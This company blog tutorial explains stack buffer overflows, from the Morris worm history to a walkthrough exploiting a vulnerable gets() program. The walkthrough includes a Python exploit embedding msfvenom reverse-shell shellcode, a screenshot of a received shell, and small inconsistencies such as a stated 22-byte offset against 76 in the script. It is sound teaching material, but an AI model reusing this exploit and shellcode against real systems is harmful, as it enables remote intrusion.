arbisoft brand logo
arbisoft brand logo
Contact Us

Memory Corruption to Hack the Machine; Enslaving Software to Run sHell-code

Ameer's profile picture
Ameer HamzaPosted on
15-16 Min Read Time
https://d1foa0aaimjyw4.cloudfront.net/Blog_Img_1_f7700098f2.png

Background

An exploit was unleashed on the internet from a computer at MIT. From colleges to NASA, every organization connected to the internet was infected by exploiting a stack-based buffer overflow. The Harvard grad responsible was charged and fined under the Computer Fraud and Abuse Act.

 

1988 marked the rise of the Internet. Robert Tappan Morris, the son of a renowned computer scientist and cryptographer, was also a genius. In a world where learning software development was not as easy as it is now, let alone grasping its concepts, Morris had a computer and a mentor at home. His mentor had contributed to early versions of Unix, including the math library, the dc programming language, and the crypt program. In a time when there was no scrolling addiction and time passed slowly, Morris used to spend his time working with computers and building software programs.

 

Morris developed a program that shifted the software industry model to a whole new level. Not only did he create a sophisticated program, but he also exploited a security vulnerability that became a bug class of its own. Bugs from this same class are still being discovered to this day. Imagine building a plane today—it's not as special as being the one who invented the plane and flew it for the first time.

 

The following blog will cover the buffer overflow vulnerability and how it can be exploited to hack a machine.


Introduction

Stack-based buffer overflow occurs when data written in a buffer is greater than the buffer’s storage capacity. If an 8-byte buffer is allocated on the stack and the data being stored is greater than 8 bytes, it will corrupt the adjacent memory locations on the stack and cause the program to crash.

 

The question arises: how can this crash be leveraged to compromise the entire machine?

 

Technical details

Stack

Human beings have two hands, and they can hold two basketballs at a time. If someone throws another basketball at me, I will put one of the basketballs on the table so my hand gets free, and I will catch the next basketball. Now, I have two basketballs in my hands and a third one on the table. If someone keeps throwing the basketballs at me, I will keep repeating the process—placing a basketball on the table and catching the next basketball. 

 

That table is just like the stack in computer architecture, and hands represent CPU registers. Both serve the purpose of holding data. The stack stores local variables, function parameters, or any kind of data that is being stored temporarily until execution is finished. Every function call gets its own stack frame. The stack runs in LIFO mode—last in, first out.

 

direction   |---------------------|                   ^
of stack    | Space for arguments | <== $esp (SP)     |
growth      | to called routines  |                   |
     ^      |---------------------|                   |
     |      |  Local variables,   |                   |
     |      |  temporary values   |                   |
     |      |---------------------|                   |
     |      | Other callee-saved  |                   | Current
     |      |      registers      |                   | stack
     |      |---------------------|                   | frame
     |      |   Saved $ebp (FP)   | <== $ebp (FP)     |
     |      |---------------------|                   |
     |      |   Return address    |                   |

 

P.S. I don’t want to bombard you with information regarding how many registers there are and what they do, but I will mention some that are required to understand the bug.

 

In 32 32-bit architecture:

 

  • EBP points at the bottom of the stack frame
  • ESP points at the top of the stack frame
  • EIP points to the address to be executed

 

Hence the name eBasePointer, eStackPointer, eInstructionPointer. The reason for not explaining “E” is out of the scope of the blog, if you are curious, you can visit this link

0_H8eaKdSdiGQHM_V7.png

 

Function calls the hidden layer

Programs consist of multiple lines of code/instructions, and they run sequentially. There are multiple registers in computer architecture; one of them is called the “PC” (Program Counter) or “IP” (Instruction Pointer), which holds the address of the next instruction to be executed. 

 

When a function is called, the sequential running of the program gets interrupted because the instruction pointer will jump to the implementation of the function. Before jumping to the implementation of the function, the address of the instruction right after the function call gets stored on the stack so the “IP” (Instruction Pointer) can return to it after completing the implementation of the function. It is called the return address because we return to it after completing the function.

 

Screenshot from 2025-04-13 17-19-55-20250413-121955.png

Stack during Function call. (Copied)

 

After completion of the function, the instruction pointer returns to the address that was stored on the stack, and then the program starts executing sequentially as it was before. Calling a function, in simple words, is: “Store the address right after the instruction pointer, jump to the function implementation, and execute the code, return to the address that was stored earlier.”

 

int func(){
    return;
}
int main(){
    func();
    printf("Hello Mars!");    
    return 0;
}

 

The above program has been compiled and is being analyzed in the debugger.

The arrow indicates the EIP.

 

Screenshot from 2025-04-09 16-02-17-20250409-110217.png

Top of stack before function call 

 

EIP points at the “Call 0x804841d <func>” instruction to be executed. The top of the stack contains some random address that points to zero. When this instruction gets executed, check out the top of the stack, it should store the address 0x8048431 so EIP can come back to it after the completion of func();

 

Screenshot from 2025-04-09 16-05-04-20250409-110504.png

Top of stack after call instruction

 

As soon as the call instruction is executed, the return address/next address after the call instruction is pushed onto the stack. ESP points at 0x8048431 <main+14>, and EIP is inside the func();

 

So far, we should know 5 things straight away:

 

  1. How a function call works at a lower level
  2. EBP: Base of the stack frame
  3. Return Address: The address to return to after the function execution is complete
  4. EIP: Points at the next instruction to be executed
  5. EBP: Indicates the base of the stack frame

 

Vulnerability Analysis

gets() is a pre-defined function in C that is used to read a string or a text line and store the input in a well-defined string variable. The function terminates its reading session as soon as it encounters a newline character.
 

P.S. The gets() function is probably the most unsafe function that was ever in the C standard library.

 

It is unsafe because there is no way to prevent a buffer overflow. The function accepts input from the user and stores it in a buffer. It does not perform bounds checking on the size of its input.

 

2buff.c

#include <stdio.h>

int main() {
    char buffer[10];
    printf("Enter some text: ");
    // Using gets() - Vulnerable!
    gets(buffer);
    printf("You entered: %s\n", buffer);
    return 0;
}

 

You can compile this binary on your local machine using  

 

gcc -fno-stack-protector -z execstack buff.c -o buff

 

Vulnerability Discovery

The vulnerability arises when a value is stored in a buffer greater than the buffer’s capacity; it smashes/overwrites the return address on the stack. The return address is overwritten with a garbage value, let’s suppose AAAA. This is not a valid memory address; it points to nowhere, so when EIP executes this return address, the program will result in a crash. Let’s send a long string of 'A's.

 

Screenshot from 2025-04-11 12-23-04-20250411-072304.png

The program’s happy flow

 

Let’s analyze the bug in GDB by sending a long string of 'A's.

Screenshot from 2025-04-10 18-27-42-20250410-132742.png

EIP and ESP pointing to user supplied data due to buffer overflow.

 

Screenshot from 2025-04-10 18-28-20-20250410-132820.png

Program Crashed because EIP tried to access invalid Address 0x41414141  

 

Since we control the return address, if we can make the program return to an invalid address like AAAA, we can make the program return to a valid address as well, and the EIP will start executing the code from that address. Our goal is to place shellcode on the stack and set the stack address in EIP to execute the shellcode.

 

Shellcode

Shellcode is a set of instructions written in byte code that the CPU executes. A program written in any language can be converted into byte code, and that byte code is served to the CPU. It gets executed and performs the exact same task that was supposed to be done by the program.

 

Byte code has been extracted from an ELF binary "testcode" using a tool called objdump. Similarly, any program’s byte code can be extracted and served to the CPU. There are also a couple of tools that generate the shellcode, but they are only helpful in particular scenarios.

 

Screenshot from 2025-04-10 16-20-56-20250410-112056.png

Byte code of a program written in the C language.

 

A program written in assembly language becomes very efficient when converted into shellcode, giving more power to deal with blockers that come in the way of shellcode execution or break the shellcode, as compared to other languages.

 

In this blog, we are going to use Msfvenom for generating shell code and use it to exploit the bug.

Screenshot from 2025-04-11 19-39-39-20250411-143939.png

 

-p is used to indicate the platform that is going to be exploited. In our case, it is Linux x86.

-f flag is used to indicate the type of file in which you are going to use the payload. In the current scenario, it is Python. rb, exe, and js are other examples.

CMD is the command executed when the payload triggers.

Linux’s exec syscall will be called, and the /bin/bash program will be executed.

 

Exploit Development

The goal is to find the offset to overwrite the EIP, place the stack address in it, and place our shellcode on the stack.

AAAAAAAAAAAAAAAAAAAAA Stack Address Shellcode

.___...

There are multiple tools available to assist in exploit development, which can be integrated with GDB to analyze and debug the binary. I will be using Python Exploit Development Assistance, also known as PEDA.

To find the offset to EIP, instead of sending a bunch of 'A's, I will send a unique pattern of 50 characters, then identify which substring of the unique pattern appears in the EIP.

 

Screenshot from 2025-04-11 13-02-02-20250411-080202.png

Unique pattern created via PEDA

 

Screenshot from 2025-04-11 13-04-15-20250411-080415.png

Unique Pattern appears in EIP register

 

Calculating the offset to the value that got caught in EIP will give the exact offset to EIP

Screenshot from 2025-04-11 13-06-04-20250411-080604.png

Offset to EIP

Any data after the initial 22 bytes will be stored in EIP. Let’s verify this

 

Screenshot from 2025-04-11 14-57-58-20250411-095758.png

EIP in control

 

Overwriting EIP with the ESP address to see if the execution flow jumps to the stack, placing a breakpoint bytecode \xCC on the top of the stack, followed by 100 'C' characters where our shellcode will be placed. If it does jump successfully to the top of the stack, then EIP will hit the breakpoint, followed by our 'C's, and GDB will show the SIGTRAP CCCC.

 

Screenshot 2025-04-18 at 11.19.35 AM.png

 

According to the payload, now the execution flow will jump to the stack, and the breakpoint followed by CCC should be in the EIP. If this happens, then it means I can place shellcode instead of a bunch of 'C's, and the malicious code will be executed.

 

Screenshot from 2025-04-11 16-20-39-20250411-112039.png

EIP points at the top of stack

 

Screenshot from 2025-04-11 16-21-28-20250411-112128.png

Stack contains our 100 C chars and a break-point byte code cc

 

Note: \xcc has nothing to do with character 'C'. We can use any character instead of C. whereas \xcc is static pre-defined machine code to let CPU know that this is break point and pause the execution for debugging.

 

Now it is time to remove the C characters and place shellcode there. Msfvenom will be used to generate the shellcode. And what our shellcode will do is initiate a reverse shell.

 

A reverse shell is a type of connection that is established when a script or malicious code is run on the victim’s machine. It creates a connection with the attacker’s machine, and the attacker gets complete access to the victim’s terminal/shell. This is the easiest way to understand a reverse shell.

 

Screenshot from 2025-04-13 15-05-00-20250413-100500.png

Usage of msfvenom, a built-in program in Kali Linux

 

-p indicates the type of payload. In this case, a TCP reverse shell for the Linux x86 platform is generated.

-b indicates the bad character that must not be present in the shellcode, otherwise, the shellcode will break. In the current scenario, \x0a and \x0d represent the newline character, and \x00 represents the null byte. As soon as the gets() function receives a newline, it does not take any further input, and the null byte represents the end of the string. For that reason, these byte codes must not be present in the shellcode.

LHOST indicates the IP address of the machine that is going to catch the reverse shell.

LPORT indicates the port of the machine that is going to catch the reverse shell.

exploit.py

 

import struct

buf =  b""
buf += b"\xdb\xc5\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x12\xbf"
buf += b"\xd4\xe5\xea\x91\x31\x7e\x17\x03\x7e\x17\x83\x12"
buf += b"\xe1\x08\x64\xab\x31\x3b\x64\x98\x86\x97\x01\x1c"
buf += b"\x80\xf9\x66\x46\x5f\x79\x15\xdf\xef\x45\xd7\x5f"
buf += b"\x46\xc3\x1e\x37\x99\x9b\x85\xd7\x71\xde\x45\xd7"
buf += b"\xfa\x57\xa4\x67\x9a\x37\x76\xd4\xd0\xbb\xf1\x3b"
buf += b"\xdb\x3c\x53\xd3\x8a\x13\x27\x4b\x3b\x43\xe8\xe9"
buf += b"\xd2\x12\x15\xbf\x77\xac\x3b\x8f\x73\x63\x3b"
#Shellcode generated via msfvenom for reverse shell

ret_addr = struct.pack("I", 0xbffff6f8)
# Return address into littile endian for x86 arch

payload = 'A'.encode() * 76 + ret_addr  + bytes(b'\x90') * 16  + buf
#'\x90' is byte code of no operation, actually it does nothing but jumps
# to the next instruction. Used for padding and maintaining the stack alignment

with open("/var/tmp/sHellcode/poc.txt" , "wb") as f:
	f.write(payload)
# Above payload will stored in poc.txt file which will be served to the program

 

Screenshot from 2025-04-11 19-36-45-20250411-143645.png

Program executed with the above payload

 

Screenshot from 2025-04-13 15-35-24-20250413-103524.png

Reverse Shell received from warzone machine 
 

 

Real World Examples

Case Study

The Morris worm exploited a flaw in the sendmail program, which was a common email utility used on Unix systems.
 

The bug discussed in the background section exploited a buffer overflow vulnerability within the fingerd (finger daemon) service. By sending carefully crafted, excessively long input to the fingerd service, the worm could overwrite memory locations, allowing it to inject and execute its own malicious code. This is the specific buffer overflow that the Morris worm used.

 

EternalBlue

A bug in Windows SMBv1 implementation was exploited from 2013 to 2017 by the National Security Agency (NSA) until a hacker group, Shadow Brokers, hacked the NSA and released their exploits publicly. This turned into a disaster for all devices connected to the internet when the WannaCry ransomware began spreading.

 

There's a security flaw in how Windows handles the SMBv1 protocol. Specifically, when the system processes File Extended Attributes (FEAs), a function in the operating system's core (kernel) can accidentally overflow a memory area called the Large Non-Paged Pool.

 

This happens when the system goes through the FEA list and tries to turn it into a different format (NTFEA LIST). Due to a miscalculation in the total size of the data, it ends up writing more than the memory can handle, causing the overflow.

 

WannaCry

The WannaCry ransomware attack was a worldwide cyberattack in May 2017 by the WannaCry ransomware cryptoworm, which targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payments in Bitcoin cryptocurrency through EternalBlue. - Wikipedia

 

OS Mitigation

Cases like the ones above led operating system vendors to introduce mitigations to prevent exploits, regardless of whether the vulnerability exists in any installed software. The types and details of these mitigations are beyond the scope of this blog. However, the cat-and-mouse game has begun since then, with every mitigation having its bypass or workaround in some way. Now, we see exploitation from pager devices to the latest iPhones being hacked.

 

Bug Still Known and Found

Google Chrome – VP8 Encoding Heap Buffer Overflow (CVE-2023-5217)

VLC Media Player – Heap-based buffer overflow vulnerability (CVE-2020-13428)

cURL – Heap overflow in cURL’s SOCKS5 proxy handshake (CVE-2023-38545)

...Loading

Explore More

Have Questions? Let's Talk.

We have got the answers to your questions.

Newsletter

Join us to stay connected with the global trends and technologies